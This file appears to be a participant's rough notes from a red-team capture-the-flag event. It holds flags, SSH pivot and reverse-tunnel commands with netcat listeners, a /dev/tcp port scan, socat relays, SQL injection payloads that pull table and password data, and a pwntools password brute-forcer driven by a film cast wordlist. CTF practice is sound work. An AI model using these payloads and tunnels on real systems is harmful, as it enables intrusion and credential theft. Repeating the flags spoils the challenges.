NOTES_CTF_bishopfox_talentrepublic_12.txt

1. /*
2. https://lucha-de-zorros.bishopfox.com/
3. https://twitter.com/todmephis/status/1402659976867467272
4. */
5.  
6. proxychains ssh level11@167.71.187.239
7.  
8. 1-> 4202c26842398c1d0772ed9eed195113
9. 2-> 943430e07fd566bc96aa05fca3c96e48
10. 3-> 2cadca6148093c403d82396252b8c4db
11. 4-> 72f6af6b0005adb15fbc91e1b140115f
12. 5-> 7b6c2552940f47a27fbd729ae0e2893c
13. 6-> 7cb1963d316b9a302cf6c204d35b7302
14. 7-> RG8geW91IGV2ZW4gbGlmdCBicm8g
15. 8-> bGV0J3MgZmluZCBzb21ldGhpbmcg
16. 9-> 96ab15e954f1267ea04c35de2d771c2b
17. 10 -> 955830
18. 11-> 192
19. 12 -> 0982e2a869857644074d06b1a4fd1bea
20. 13 -> f4736e1eb28b1d9055c5f5d58a49b5a6
21. 14 -> 0ea027e3835aa87a4a47465321c5fe75
22. 15 -> 4.19
23. 16 -> Debian
24. 17 -> 6b39034a8045ed996a436f8d09031522
25. 18 -> 9a42b1822710d790a393800f2896a8f7
26. 19 -> b06a246b0646b337f319316b9232151c
27. 20 -> 5cf82d972614f73422f899f90cfce80f
28. 21 -> 65230da2ead4ba2ed76ee2605cadcd4d
29.  
30. traceeasy -> ts{whydidyouevenrunit}
31.  
32. tigers -> TS{JoeMadeAllTheseTaligers}
33. web recon1 -> TS{CaroleBaskinTotallyDidIt}
34. web recon2 -> TS{JeffLoweStoleAllMyTigers}
35.  
36. CANDY -> TS{PeopleComeToSeeMeNotTheTigers}
37.  
38. OLD IE BROWSER -> TS{ThisBrowserIsPerferctForWatchingJoeExoticTV}
39.  
40. admin section -> ' or 1=1 -- > TS{JoeIsGladYouCameToSeeAllHisTigers}
41.  
42. search tiges -> -1' or 1=1 /* > TS{LookingForTigerIsDarnHard}
43.  
44. what is joe's password? -> tigers
45.  
46. clicks ->ts{bufferoverflow}
47. /*
48.  
49. ts buff { ow ov ag } fl er
50.  
51. ts{bufferoverflag}
52. */
53.  
54. Perime -> ssh tunneler@tunneler.threatsims.com -p 2222 -L 8000:IP:80 -> ts{SSHtoANonStandardPort}
55.  
56. Access the web -> ts{TheFirstTunnelIsTheEasiest}
57.  
58. PIVOT -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -> ts{IThoughtWeLostYouOnTheWay}
59.  
60. PIVOT2 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222,whistler@10.218.176.199:22 crease@10.112.3.12 -> ts{TunnelsInTunnelsInTunnels}
61.  
62. BEACONS 1 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -R 10.112.3.199:58671:127.0.0.1:5999 -> nc -lvnp 5999 -> ts{GreatFirstReverseTunnel}
63.  
64.  
65. BEACONS 2 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 127.0.0.1:7000:10.112.3.88:7000 -> fast -> nc -lvnp 5555 -> ts{YourTunnelGameisAlright}
66.  
67. fast(){
68. ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -R 10.112.3.199:$1:127.0.0.1:5555;
69. }
70.  
71.  
72.  
73. Network scan -> for port in {1..65535}; do echo >/dev/tcp/10.112.3.207/$port && echo "port $port is open"; done > test.txt -> ftp 10.112.3.207 53121 -> ts{SocatTunnelsForTheWin}
74.  
75. SNMP -> pivot2(crease) socat tcp-listen:6666,fork udp4:10.24.13.161:161 -> pivot1 (whistler) proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 6666:10.112.3.12:6666 -> LOCALHOST socat UDP4-LISTEN:161,fork TCP:localhost:6666 -> LOCAL snmpwalk -v1 -c public localhost -> ts{UDPthroughTCPtunnels}
76.  
77. WEB2 -> pivot2(crease) socat tcp-listen:6666,fork tcp6:[2a02:1b8:b010:9010:1::86]:80 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 6666:10.112.3.12:6666 -> curl 127.0.0.1:6666 -> ts{IPv6isNotActuallyNew}
78.  
79. REPORT1 -> TPS-8352 //XD TPS-31337
80. REPORT2 -> TS{GetThemTPSReports}
81.  
82.  
83. TheFlagforthischallengeis:ts{IreallymissThePongs}
84. elgoticalnest{ralmsTeog}hFafrhshlegi:sIelyishPnsT
85.  
86.  
87. view-source:http://troll.threatsims.com:4646//lel.php.back
88.  
89. <?php
90. @chdir('/tmp/bf');
91. if (isset($_GET['DL2k21']) && strlen($_GET['DL2k21']) <= 8) {
92. @exec('echo -n '.base64_decode($_GET['DL2k21']));
93. }
94.  
95. // That was easy! Now you have the code that runs in the server; congratz.
96.  
97. // Watch out: There's something else, evil, being executed...
98.  
99. ?>
100.  
101.  
102.  
103.  
104.  
105.  
106.  
107. 22->643b2616b33de99b179c33950970d519
108.  
109.  
110. -1' or age < 60 /*
111. -1' or 1=1 order by 4 /*
112.  
113. -1' or 1=1 union all select (SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%' limit 1)as t,2,3,4 /*
114. -1' or 1=1 union all select (SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%' limit 1,2)as t,2,3,4 /*
115. -1' or 1=1 union all select (SELECT typeof(password) from user limit 1)as t,2,3,4 /*
116.  
117. -1' or 1=1 union all select (SELECT password>=25 from user limit 1)as t,2,3,4 /*
118. -1' or 1=1 union all select (SELECT password>=25 from user limit 1)as t,2,3,4 /*
119.  
120. -1' or 1=1 union all select (SELECT sql FROM sqlite_master WHERE name = 'user';)as t,2,3,4 /*
121.  
122. -1' or 1=1 union all select (SELECT sql FROM sqlite_master WHERE name = 'user' limit 1)as t,2,3,4 /*
123.  
124. ####ping.py
125. from pwn import *
126. r = remote("pong.threatsims.com",2345)
127. correct="T";
128. r.recv()
129. r.sendline(correct);
130. c=r.recv().decode().replace('\n','').replace('\r','');
131. flag=""+c;
132.  
133. def loop(c):
134. correct=r.recv().decode().replace('\n','').replace('\r','');
135. r.sendline(correct);
136. correct=r.recv().decode().replace('\n','').replace('\r','');
137. r.sendline(correct);
138. return correct;
139.  
140. while True:
141. c=loop(c);
142. flag+=c;
143. print(flag);
144.  
145.  
146. #####list1.txt
147. Ron
148. Livingston
149. Ron
150. Livingston
151. ...
152. Peter
153. Jennifer
154. Aniston
155. Jennifer
156. Aniston
157. ...
158. Joanna
159. David
160. Herman
161. David
162. Herman
163. ...
164. Michael
165. Bolton
166. Ajay
167. Naidu
168. Ajay
169. Naidu
170. ...
171. Samir
172. Diedrich
173. Bader
174. Diedrich
175. Bader
176. ...
177. Lawrence
178. Stephen
179. Root
180. Stephen
181. Root
182. ...
183. Milton
184. Gary
185. Cole
186. Gary
187. Cole
188. ...
189. Bill
190. Lumbergh
191. Richard
192. Riehle
193. Richard
194. Riehle
195. ...
196. Tom
197. Smykowski
198. Alexandra
199. Wentworth
200. Alexandra
201. Wentworth
202. ...
203. Anne
204. Joe
205. Bays
206. Joe
207. Bays
208. ...
209. Dom
210. Portwood
211. John
212. C.
213. McGinley
214. John
215. C.
216. McGinley
217. ...
218. Bob
219. Slydell
220. Paul
221. Willson
222. Paul
223. Willson
224. ...
225. Bob
226. Porter
227. Kinna
228. McInroe
229. Kinna
230. McInroe
231. ...
232. Nina
233. Todd
234. Duffey
235. Todd
236. Duffey
237. ...
238. Chotchkie's
239. Waiter
240. Greg
241. Pitts
242. Greg
243. Pitts
244. ...
245. Drew
246. Michael
247. McShane
248. Michael
249. McShane
250. ...
251. Dr.
252. Swanson
253. (as
254. Micheal
255. McShane)
256. Linda
257. Wakeman
258. Linda
259. Wakeman
260. ...
261. Laura
262. Smykowski
263. Jennifer
264. Jane
265. Emerson
266. Jennifer
267. Jane
268. Emerson
269. ...
270. Female
271. Temp
272. Kyle
273. Scott
274. Jackson
275. Kyle
276. Scott
277. Jackson
278. ...
279. Rob
280. Newhouse
281. Orlando
282. Jones
283. Orlando
284. Jones
285. ...
286. Steve
287. Barbara
288. George-Reiss
289. Barbara
290. George-Reiss
291. ...
292. Lumbergh's
293. Secretary
294. Tom
295. Schuster
296. Tom
297. Schuster
298. ...
299. Construction
300. Foreman
301. Rupert
302. Reyes
303. Rupert
304. Reyes
305. ...
306. Mexican
307. Waiter
308. (as
309. Ruperto
310. Reyes
311. Jr.)
312. Jackie
313. Belvin
314. Jackie
315. Belvin
316. ...
317. Swanson's
318. Patient
319. #1
320. Gabriel
321. Folse
322. Gabriel
323. Folse
324. ...
325. Swanson's
326. Patient
327. #2
328. Jesse
329. De
330. Luna
331. Jesse
332. De
333. Luna
334. ...
335. Cop
336. at
337. Fire
338. Mike
339. Judge
340. Mike
341. Judge
342. ...
343. Chotchkie's
344. Manager
345. (as
346. William
347. King)
348. Justin
349. Possenti
350. Justin
351. Possenti
352. ...
353. Spectator
354. Jack
355. Betts
356. Jack
357. Betts
358. ...
359. Judge
360. Rest
361. of
362. cast
363. listed
364. alphabetically:
365. Charissa
366. Allen
367. Charissa
368. Allen
369. ...
370. Jogger
371. (uncredited)
372. Josh
373. Bond
374. Josh
375. Bond
376. ...
377. Initech
378. Security
379. Guard
380. (uncredited)
381. Bob
382. Crain
383. Bob
384. Crain
385. ...
386. Sleepy
387. Office
388. Worker
389. (uncredited)
390. Natalie
391. Denning
392. Natalie
393. Denning
394. ...
395. Initech
396. Employee
397. (uncredited)
398. Gareth
399. B.
400. DePutron
401. Gareth
402. B.
403. DePutron
404. ...
405. Office
406. Worker
407. (uncredited)
408. Samantha
409. Inoue
410. Harte
411. Samantha
412. Inoue
413. Harte
414. ...
415. Initech
416. Employee
417. (uncredited)
418. R.C.
419. Keene
420. R.C.
421. Keene
422. ...
423. Rush
424. Hour
425. Driver
426. (uncredited)
427. Mark
428. Kubiak
429. Mark
430. Kubiak
431. ...
432. Initech
433. Employee
434. (uncredited)
435. K.
436. Todd
437. Lytle
438. K.
439. Todd
440. Lytle
441. ...
442. Rush
443. Hour
444. Driver
445. (uncredited)
446. David
447. Sharp
448. David
449. Sharp
450. ...
451. Rush
452. Hour
453. Driver
454. (uncredited)
455. Fabian
456. Watkins
457. Fabian
458. Watkins
459. ...
460. Pedestrian
461. (uncredited)
462. Jared
463. B.
464. Wells
465. Jared
466. B.
467. Wells
468. ...
469. Driver
470. in
471. traffic
472. (uncredited)
473. Heath
474. Young
475. Heath
476. Young
477. ...
478. Spectator
479. (uncredited)
480. Produced
481. by
482.  
483. Mike
484. Judge
485. ...
486. producer
487. (uncredited)
488. Daniel
489. Rappaport
490. ...
491. producer
492. Guy
493. Riedel
494. ...
495. executive
496. producer
497. Michael
498. Rotenberg
499. ...
500. producerMusic
501. by
502.  
503. John
504. Frizzell
505. Cinematography
506. by
507.  
508. Tim
509. Suhrstedt
510. ...
511. director
512. of
513. photographyFilm
514. Editing
515. by
516.  
517. David
518. Rennie
519. Casting
520. By
521.  
522. Nancy
523. Klopper
524. Production
525. Design
526. by
527.  
528. Edward
529. T.
530. McAvoy
531. ...
532. (as
533. Edward
534. McAvoy)Art
535. Direction
536. by
537.  
538. Adele
539. Plauche
540. Set
541. Decoration
542. by
543.  
544. Carla
545. Curry
546. Costume
547. Design
548. by
549.  
550.  
551. ####report.py
552.  
553. from pwn import *
554.  
555. words = open('list1.txt').read().replace('\r','').split('\n')
556. r = remote("tps.threatsims.com",5000)
557. r.recv()
558. r.sendline("1")
559. d = r.recv()
560. r.sendline("TPS-8352")
561. e =r.recv().decode()
562. print(e)
563.  
564. for passwd in words:
565. print('[+] Trying : %s' % passwd)
566. r.sendline(passwd)
567. resp = r.recvline()
568. if b'Wrong' in resp:
569. r.recvline()
570. r.recvline()
571. continue
572. print(str(resp))
573. if not b'Wrong' in resp:
574. sys.exit('[+] Found! \n%s' % resp)
575.  
576.  
577.  
578. wV8E8u7OmgOS0WldXPoHWJDSaAP/gdRJ
579.  
580. elgoticalnest{ralmsTeog}
581. ts{IreeeallymissThhhePongs}
582. elgoticalnest{ralmsTeog}hFafrhshlegi
583. elgoticalnest{ralmsTeog}hFafrhshlegi:sIelyishPnsT
584.  
585.  
586.  
587.  
588.  
589.  
590.  
591.  
592.  
593.  
594. /*
595. https://alparslanakyildiz.medium.com/necromancer-ctf-solution-c675a13c8fd8
596. http://zarb.org/~gc/html/udp-in-ssh-tunneling.html
597. https://book.hacktricks.xyz/tunneling-and-port-forwarding
598. https://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing/
599. https://book.hacktricks.xyz/pentesting/pentesting-snmp
600. https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-programming-challenges.html
601. https://www.sqlitetutorial.net/sqlite-tutorial/sqlite-describe-table/
602.  
603. http://zarb.org/~gc/html/udp-in-ssh-tunneling.html
604. https://github.com/hyperreality/ctf-writeups/blob/master/2020-defcon-redteamvillage/README.md
605. https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-programming-challenges.html
606. https://www.imdb.com/title/tt0151804/fullcredits
607. https://www.eventbrite.com/e/defcon-red-team-village-ctf-qualifiers-tickets-111543144548
608. https://blog.ikuamike.io/posts/2020/grayhat_red_team_village_ctf_tunneler_writeup/
609. https://blog.ikuamike.io/posts/2020/grayhat_red_team_village_ctf_tunneler_writeup/#5-beacons-annoying
610. https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-tunneler-1,2,3,4,5,7,9.html
611. */